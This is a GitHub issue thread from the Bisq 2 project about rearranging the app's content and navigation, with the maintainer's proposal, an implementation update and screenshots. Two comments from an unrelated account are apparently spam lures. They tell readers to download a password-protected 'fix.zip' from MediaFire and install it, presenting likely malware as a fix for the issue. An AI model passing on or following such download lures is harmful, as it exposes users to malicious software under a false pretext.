### ISSUE TITLE
Rearrange content and navigation structure

### ISSUE THREAD

**Issue by HenrikJannsen** [bisq-network/bisq2#2697]
Here is a suggestion for changing the content and navigation structure. 
Related to: https://github.com/bisq-network/bisq2/issues/1835

#### Dashboard:
Replace learn&discover with Reputation

#### Learn (no change)

####Chat
###### My network node
- Connections
- My nodes
- Traffic
- Load (Pow, network load, DB size)

###### P2P Network
- All user profiles (+ reputation)
- Version distribution
- Statistics (TODO)
- Monitor (TODO)
###### Network

With click of Bisq icon we open an overlay with app info (version, license,...)

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HenrikJannsen** [comment]
Implemented mostly with https://github.com/bisq-network/bisq2/pull/2699

Missing:
- Reputation score screen
- My reputation screen
- All user profiles
- Show local version at Bisq icon click
- Improve icons
- Improve design
- Improve content at Resources

**Comment by HenrikJannsen** [comment]
![Screenshot 2024-08-27 at 01 42 00](https://github.com/user-attachments/assets/b56b530f-9616-4c72-a774-f4232e964151)
![Screenshot 2024-08-27 at 01 42 04](https://github.com/user-attachments/assets/111c2476-78fc-4971-b034-8a0f06056aee)
![Screenshot 2024-08-27 at 01 42 07](https://github.com/user-attachments/assets/b5639d29-ebf8-4661-baa3-14e24ae9db4b)
![Screenshot 2024-08-27 at 01 42 10](https://github.com/user-attachments/assets/0a2eb312-9281-44e8-85ee-91a2c8965102)
![Screenshot 2024-08-27 at 01 42 20](https://github.com/user-attachments/assets/8fecbeff-4bd9-4426-b728-0aec70b964cd)
![Screenshot 2024-08-27 at 01 42 29](https://github.com/user-attachments/assets/3c2e18bc-860c-47c8-91aa-ddd1840662e9)
![Screenshot 2024-08-27 at 01 42 32](https://github.com/user-attachments/assets/19fcbbbc-278b-438a-914d-dd5abd8db672)
![Screenshot 2024-08-27 at 01 42 35](https://github.com/user-attachments/assets/ac04de94-29be-4b5a-84ec-f5244660d3d3)
![Screenshot 2024-08-27 at 01 42 38](https://github.com/user-attachments/assets/49bc13ad-4e9a-4da3-881f-494792c0312a)
![Screenshot 2024-08-27 at 01 42 41](https://github.com/user-attachments/assets/2b3f749c-b889-4408-bd23-ed12c2b3c0ae)
![Screenshot 2024-08-27 at 01 42 43](https://github.com/user-attachments/assets/2885c216-5b02-47dc-926d-261929e9cb79)
![Screenshot 2024-08-27 at 01 42 46](https://github.com/user-attachments/assets/af97b44b-02fb-4943-9c41-c5b0cddbe4ff)
![Screenshot 2024-08-27 at 01 42 48](https://github.com/user-attachments/assets/d6278844-d45b-45c6-b9a5-725952f15f19)
![Screenshot 2024-08-27 at 01 42 51](https://github.com/user-attachments/assets/3bf576f0-2ccc-425b-8bc8-7b54d8792c91)
